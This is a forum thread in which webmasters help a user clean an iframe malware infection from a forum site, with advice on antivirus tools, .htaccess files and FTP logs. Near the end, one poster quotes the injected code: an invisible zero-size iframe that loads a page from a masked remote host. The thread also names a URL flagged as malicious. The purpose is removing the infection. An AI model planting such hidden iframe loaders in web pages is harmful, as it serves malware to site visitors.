iframe Virus Attack

[Nano]

Yes Avast Home Edition, Avira and NOD 32 is detecting this iframe as virus

 

[apirateslife]

That's good. Whatever antivirus you use. Make sure it has a script blocker. Some AV's will detect the actual virus. Others will detect the script that loads the virus as well as the virus itself. There's a big difference.

 

[Hyperz]

Also, this virus is usually spread trough an exploit in adobe reader (dodgy PDF file).

 

[Rohit]

Thank you all to provide such useful information and Help. Special thanks to Hyperz and Nano. I guess i deleted most of the malware script ...

But my Antivirus is still detecting it as a trojan virus and prompt to abort the connection and showing this:

http://conapiciudadreal.org/components/globals.php

Where to find that virus and how to remove it ???

 

[Hyperz]

Post the contents of .htaccess (be sure to remove sensitive info from it if it contains some) and remove any htm/html/shtml who's names are numbers (like 500, 403, 404, etc).

Edit:

I'm a bit confused, if your AV warns again take a screenshot of the warning and its description.

 

[Rohit]

When i open the site it shows me this and site is also loading very slow...

Help Me!

And I also don't find the .htacess file...where to find that ?

 

[Hyperz]

.htaccess is in your forum root. If there is none there you don't need to worry about it. Can you post the HTML source code of your forums homepage?

 

[Nano]

i tried to open this site and it gives a adobe plugin /photoshop plugin to be installed then closed firefox automatically i can totally said that contact ur host with the screen shot or remove that perticular file which it detct with avast home edition

 

[Hyperz]

K I checked the html source and there is nothing in there. Either one of the .js files are infected or you somehow didn't remove all of it. In any case this is worse than the one I had to solve.

 

[Rohit]

Yes ...There is no .htaccess file in my forum root.

 

[TheShadowOne]

If you cannot secure your own server/site sufficiently, you shouldn't be a webmaster, tough words but its the truth.

 

[Rohit]

Don't be so rude The ShadowOne... Many Webmaster have been facing this problem and its fact...you can't deny that...and obviously if i wasn't a webmaster i wouldn't be facing this problem...
People learn from their Mistakes. I also learned something from this mistake.
and I thank to people Like Hyperz who is always ready to help others and share their knowledge.

 

[Nano]

did u followed what i am said you, i mean
did u cleaned ur pc and formated it, uploded a fresh files and added that code in .htaccess

 

[Rohit]

Yes Nano...I formatted my Pc... also scan it with Avast pro , malware bytes and spybot
now i think my pc is clean...But i don't have .htaccess file in my forum root. I think virus deleted that .htacess file...Now What ???

 

[Nano]

can u come at msn i will say details what u need to do for this

 

[canucrackit]

get ftp logs from your webhost, see what files they edited/created. Edit/delete accordingly. Happened to me once

 

[apirateslife]

Found this.

<iframe frameborder="0" onload="if (!this.src){ this.src='http://xxx.xx:8080/index.phx'; this.height='0'; this.width='0';}" >y
<iframe frameborder="0" onload="if (!this.src){ this.src='http:/xxx.xx:8080/index.phx'; this.height='0'; this.width='0';}" >dutlatkahmsrctgdaedubgwjkhbgfjw</iframe>

 

[Rohit]

Where to find these lines ...I mean is it on Index files or any other files???

 

[apirateslife]

Normally they're placed in the index files up to 2 directories deep, maybe more.